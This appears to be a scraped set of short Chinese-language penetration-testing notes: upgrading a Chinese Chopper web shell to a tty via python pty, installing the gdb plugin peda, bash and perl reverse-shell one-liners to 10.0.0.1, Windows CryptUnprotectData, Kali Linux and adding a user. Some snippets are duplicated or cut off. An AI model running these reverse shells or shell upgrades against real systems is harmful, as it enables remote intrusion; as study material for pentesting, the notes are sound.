中国菜刀开启的shell有些功能是不可以执行的,需要转换为终端设备(tty)
一般Linux自带python环境,可以使用python模拟一个终端设备(tty)就可以执行了
1 | python -c 'import pty;pty.spawn("/bin/sh")' |
中国菜刀开启的shell有些功能是不可以执行的,需要转换为终端设备(tty)
一般Linux自带python环境,可以使用python模拟一个终端设备(tty)就可以执行了
1 | python -c 'import pty;pty.spawn("/bin/sh")' |
peda是gdb的一个插件,安装后gdb在分析逆向/溢出程序时能够提供更直观的显示。
安装peda:
1 | git clone https://github.com/longld/peda.git ~/peda |
这里shell由bash解析,有时候是由sh解析,/dev/[tcp|upd]/host/port
是Linux设备里面比较特殊的文件,读取或写入相当于建立socket
调用,命令执行后依然无法找到此目录和文件。
1 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 |
1 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
cryptUnprotectData函数对DATA_BLOB结构中的数据进行解密并进行完整性检查。唯一可以解密数据的用户是具有与加密数据的用户相同的登录凭据的用户。另外,加密和解密必须在同一台计算机上完成。
1 | BOOL WINAPI CryptUnprotectData( |
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
(1) 打开终端。输入下面这个命令,即可创建新用户。( test 换为想要创建的用户名)
1 | # useradd -m test |